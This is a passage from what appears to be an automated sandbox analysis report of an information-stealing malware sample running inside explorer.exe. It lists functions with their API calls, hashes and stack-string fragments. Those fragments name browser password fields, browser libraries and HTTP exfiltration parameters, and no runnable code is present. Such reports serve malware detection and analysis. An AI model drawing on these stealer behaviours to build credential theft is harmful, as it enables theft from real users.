Opcode Fuzzy Hash: f66e468dd6a67baca3f0ec79abf3971de47a5e4d56eb4a4ffb1ce07e7bc451c7
Instruction Fuzzy Hash: 1F51DE76E04346DFDB25EFA8D484B9EBBF2BF88314F144159D40D6B281D770A886CB91

Uniqueness

Uniqueness Score: -1.00%

Function 019ECEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON

Download Yara Rule

APIs

@_EH4_CallFilterFunc@8.LIBCMT ref: 019ECFBD

Strings

@, xrefs: 019ECF0A
@4_w@4_w, xrefs: 019ECFD5, 019ECFDA, 019ECFF1

Memory Dump Source

Source File: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: CallFilterFunc@8
String ID: @$@4_w@4_w
API String ID: 4062629308-713214301
Opcode ID: fcbbd936e3daa538bd39424423c000ed306ea733af1ca98a2dcf92444d33aca2
Instruction ID: 36b195a0f8dbbb4874e298894897a08d054de654e022995bf53daab7ccfbab77
Opcode Fuzzy Hash: fcbbd936e3daa538bd39424423c000ed306ea733af1ca98a2dcf92444d33aca2
Instruction Fuzzy Hash: E741CE75900219EFDB22DFE9C844AAEBBF8FF94B41F04452AE909DB254D730D901CB61

Uniqueness

Uniqueness Score: -1.00%

Function 019DFD82 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 019DFE73
RtlDebugPrintTimes.NTDLL ref: 019DFE95

Strings

$, xrefs: 019DFE3D

Memory Dump Source

Source File: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: 16dd801ad03094630ba82e4d4f2e3defefa5188f532a379a0a9f48f0f6821a53
Instruction ID: f91d6cee2272f38124f0373b53243f555b1dd5178c488b3c1676189ae9dc0fc2
Opcode Fuzzy Hash: 16dd801ad03094630ba82e4d4f2e3defefa5188f532a379a0a9f48f0f6821a53
Instruction Fuzzy Hash: 8A417E75E00209ABDF11DF99D881AEEBFB9FF88744F144119E909A7341D771AD12CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0195DF81 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0195E040

Strings

0, xrefs: 0195E020
0, xrefs: 0195E00B

Memory Dump Source

Source File: 0000000F.00000002.1589093646.0000000001956000.00000040.00001000.00020000.00000000.sdmp, Offset: 01930000, based on PE: true

Associated: 0000000F.00000002.1589093646.0000000001930000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001937000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019B6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.00000000019F2000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A53000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 0000000F.00000002.1589093646.0000000001A59000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1930000_ySqETqNvdTbE.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0$0
API String ID: 3446177414-203156872
Opcode ID: 199602b4b425e6ab924cd90824b3298ba0560ffa1d6df880776fa19be2be5429
Instruction ID: 8d73a00ef2b531d36fc6d4e53268778963f00679e8e7c6a66dfa64c7d9718812
Opcode Fuzzy Hash: 199602b4b425e6ab924cd90824b3298ba0560ffa1d6df880776fa19be2be5429
Instruction Fuzzy Hash: 59414CB16087069FD350CF28C584A5ABBE9FB88314F04496EF98CDB341D771EA05CB96

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: explorer.exePID: 3504, Parent PID: 1544COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	444
Total number of Limit Nodes:	15

Executed Functions

Function 10172F82 Relevance: 23.6, APIs: 3, Strings: 10, Instructions: 815
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32 ref: 1017312E
setsockopt.WS2_32 ref: 10173830
recv.WS2_32 ref: 10173859

Strings

tion, xrefs: 10173331
ose, xrefs: 1017333F
&br=, xrefs: 10173509
dat=, xrefs: 10173290
GET , xrefs: 10173318
: cl, xrefs: 10173338
nnec, xrefs: 1017332A
Co, xrefs: 10173323
&sql, xrefs: 10173471
&un=, xrefs: 101734F1

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: getaddrinforecvsetsockopt
String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
API String ID: 1564272048-1117930895
Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 337e5f225b619c953ad29cc09e7640407029f95f15c2963e9ac0e4258aa9f171
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 32529F34618A488BC759EF68C4857D9B7E1FB54300F51862EE4AFC7142EF38B94ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 10172232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 10172449

Strings

`, xrefs: 1017241D

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 0917a93056b2e6a435c5cc4e63d9bbfd324d84f376349c89827b395978c4b450
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 93225C70A18A499FCB89DF28C4957EAF7E1FB98301F51422EE45ED3250DB34E952CB81

Uniqueness

Uniqueness Score: -1.00%

Function 10173E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10173E67

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 1268e27deaad663cf29c6c1b4e0d75e3890f6ba1625a8528feddd4ffbdf33487
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: CD01B134628B884F8788EF6CD48116AB7E4FBDD314F004B3EE99AC3250EB74C5414742

Uniqueness

Uniqueness Score: -1.00%

Function 10173E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 10173E67

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: a430db2fc4f6ba4e3ac778e689f8ffdfcd1f4b065608ee942645a0ad35fa8ddb
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: CF01A234628B884B8748EB2C94422A6B7E5FBCE314F004B3EE99AC3250DB25D5024782

Uniqueness

Uniqueness Score: -1.00%

Function 1016D8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 1016D9A0

Strings

nt: , xrefs: 1016D91E
User-Agent: , xrefs: 1016D935, 1016D948
on.d, xrefs: 1016D902
urlmon.dll, xrefs: 1016D959

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 3eb8f2f2192054174304c1c7c88853644dabbf5046d2ee38aa22e37c9a349c68
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: AB31E331A14A0C8FCB44EFA8C8857EEB7E1FF68204F40422AE55ED7250DF789A45C789

Uniqueness

Uniqueness Score: -1.00%

Function 1016D8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 1016D9A0

Strings

nt: , xrefs: 1016D91E
User-Agent: , xrefs: 1016D935, 1016D948
on.d, xrefs: 1016D902
urlmon.dll, xrefs: 1016D959

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 01c00284295164c88fc21da5597b3935b4625e0822b3b8da060ca121e36fa683
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 1221E930A10A4C8BCB05EFA8C8857ED7BF1FF68204F40421EE55AD7250DF789645C785

Uniqueness

Uniqueness Score: -1.00%

Function 10169B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10169CCA

Strings

el32, xrefs: 10169BA0
kern, xrefs: 10169B99
.dll, xrefs: 10169BCD

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 4e9f5d37acf99db0b08cb7125b1016cc8ac5bc88e13835ea0acc8f6059e56835
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: C4416974918A088FDB94EFA8C8D9BED77E1FB68300F00417AD84EDB255DE349945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 10169B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexW.KERNEL32 ref: 10169CCA

Strings

el32, xrefs: 10169BA0
kern, xrefs: 10169B99
.dll, xrefs: 10169BCD

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: dce411b90b6b494dd93efdb106318b81bbeace510c90b469a4d740231c3a65f8
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: C7416774918A088FCB84EFA8C899BED77E1FB68300F00416AD84EDB255DE349945CB85

Uniqueness

Uniqueness Score: -1.00%

Function 1016F72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 1016F791

Strings

ect, xrefs: 1016F761
conn, xrefs: 1016F75A

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 2122145d8ea81e798727f36c3a860eabfafb863ed9e80cabfced7be13b20d393
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 75015E30618B188FCB84EF1CE088B55B7E0FB68314F1545AEE90DCB226C674D8818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 1016F732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 1016F791

Strings

ect, xrefs: 1016F761
conn, xrefs: 1016F75A

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 6a35e1c2f77c1463c66b5a80c9951e8b22b374a4388044b151c5c55bb935a5c3
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 4B012170618A1C8FCB84EF5CE448B5577E0FB59314F1541AEE90DCB226C674C9818BC2

Uniqueness

Uniqueness Score: -1.00%

Function 1016F6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 1016F713

Strings

send, xrefs: 1016F6DA

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 8bda075ec457b6df8b8235284a0f44c1a7e0aed98e73c349d5ba4a621665d19a
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 1F017570518A1C8FCBC4DF1CE048B1577E0FB58314F1641AED85DCB266C670D881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 1016F5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 1016F611

Strings

sock, xrefs: 1016F5D9

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: 0178482a2d05393e99a7394d3e50e2cda97df29b496dac55332bc84a7a75afb2
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: D9012C70618A188FCB84EF1CE048B55BBE0FB59354F1545AEE85ECB276C7B4C981CB86

Uniqueness

Uniqueness Score: -1.00%

Function 101672DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 1016732D

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 04a9ba398025908023dce30ca5a370045c99c2bc758e01522a9fdafa78727555
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 09316A74614B49DBDB54DF2988882E5B7A1FB64300F44826FCD2DCA206DBB8A464DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 10167412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 10167461

Memory Dump Source

Source File: 00000010.00000002.3911205312.00000000100B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 100B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_100b0000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: 423c721ef19a06a36ca26a111bff8f4f1ffd5d16f59308c04d10316300f293f8
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: D4F04634268A480FD788EF2CD84563AF3D0FBE8204F40463EE54DC3260DE38C5824706

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0FFF7D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

M, xrefs: 0FFF8082
dll, xrefs: 0FFF7F4C
ll, xrefs: 0FFF7F13
el32, xrefs: 0FFF7F27
kern, xrefs: 0FFF7F5A
net., xrefs: 0FFF7F44
.dll, xrefs: 0FFF7F2F
32.d, xrefs: 0FFF7F0B
wini, xrefs: 0FFF7F72
user, xrefs: 0FFF7F03
S, xrefs: 0FFF8073

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 7d31d5ea80b74e5d9d7817d0bdeee5936fb09d19418913562b2c67c7833a7de2
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 7AE15974618B488FD764DF68C484BAAB7E0FF58300F804A2EA59FC7256DF34A545CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFA792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

user, xrefs: 0FFFA876
ypte, xrefs: 0FFFA8DA
guid, xrefs: 0FFFA7CE
swor, xrefs: 0FFFA8EA
e, xrefs: 0FFFA8BD
dUse, xrefs: 0FFFA8AD
name, xrefs: 0FFFA87D
encr, xrefs: 0FFFA8D2
itUR, xrefs: 0FFFA85D
rnam, xrefs: 0FFFA8B5
ypte, xrefs: 0FFFA8A5
form, xrefs: 0FFFA84D
Fiel, xrefs: 0FFFA884
d, xrefs: 0FFFA8F2
encr, xrefs: 0FFFA89D
dPas, xrefs: 0FFFA8E2
Subm, xrefs: 0FFFA855

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 5cd25734fe27e7dbe674674ed73c40117b33cb8fd38d400d6ede94ceba3c6349
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 78B19C30518B488EDB14EF68C489AEEB7F1FF58340F40451EE49AC7266EF70A449CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0FFF8622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

e, xrefs: 0FFF866D
l, xrefs: 0FFF86AC
i, xrefs: 0FFF869E
l, xrefs: 0FFF86D6
c, xrefs: 0FFF8697
s, xrefs: 0FFF8689
n, xrefs: 0FFF86BA
d, xrefs: 0FFF867B
d, xrefs: 0FFF86A5
u, xrefs: 0FFF8661
t, xrefs: 0FFF86C8
w, xrefs: 0FFF86B3
d, xrefs: 0FFF86CF
2, xrefs: 0FFF8674
l, xrefs: 0FFF8682
p, xrefs: 0FFF8690
n, xrefs: 0FFF86C1

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: b27086c2a5cef298d6805d91fcbe55b06e0e3a75c50602ebd3bf8628d2d8c87a
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: A341C070A18B088FDB14DF88A8457AD7BE2FF48740F40025ED909D7252DBB4AD49CBD6

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFFAB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

], xrefs: 0FFFFC3D
[, xrefs: 0FFFFC66
n, xrefs: 0FFFFC98
l, xrefs: 0FFFFC35
e, xrefs: 0FFFFCA0
l, xrefs: 0FFFFCE2
D, xrefs: 0FFFFCDA
[, xrefs: 0FFFFBF6
b, xrefs: 0FFFFC73
[, xrefs: 0FFFFC90
c, xrefs: 0FFFFC0B
], xrefs: 0FFFFCA8
[, xrefs: 0FFFFC2D
[, xrefs: 0FFFFCCD

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 7f216a87766efe72abac84c6a18c2307ffbcc33161f03a89bb65fcccc2f8882e
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 47C15974618B088BD758EF24C885AEAF3E1FF98304F40472AA59EC7256DF30A515CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFFF12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

0, xrefs: 0FFFFF5B
r, xrefs: 0FFFFFB8
., xrefs: 0FFFFF63
r, xrefs: 0FFFFF90
r, xrefs: 0FFFFF88
c, xrefs: 0FFFFFC8
n, xrefs: 0FFFFF6B
r, xrefs: 0FFFFFC0
r, xrefs: 0FFFFFB0
r, xrefs: 0FFFFFA8
r, xrefs: 0FFFFFA0
r, xrefs: 0FFFFF98

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 6610d64f62b246f294edaf22f693ed8b24c3c92bdf78d1f7cf5da6cd4dafcf63
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: 2551B4305187488FE719DF18C8852EAB7E5FB85740F501A2EF8CBC7256DBB49906CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0FFF92F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 0FFF932E
nspr, xrefs: 0FFF94D4
4.dl, xrefs: 0FFF94DB
dragon_s.dll, xrefs: 0FFF9614
opera_browser.dll, xrefs: 0FFF9629
l, xrefs: 0FFF94E2
sspi, xrefs: 0FFF9320
cli., xrefs: 0FFF9327

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: ad390ca26e944b5aa43745972959274fb31277480a11e35ec40ef42e0b5c6d75
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 7BC1A170618A194FC758EF68D895AEAB3E1FF98300F844329950EC7266DF74EA06C785

Uniqueness

Uniqueness Score: -1.00%

Function 0FFF92F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

dll, xrefs: 0FFF932E
nspr, xrefs: 0FFF94D4
4.dl, xrefs: 0FFF94DB
dragon_s.dll, xrefs: 0FFF9614
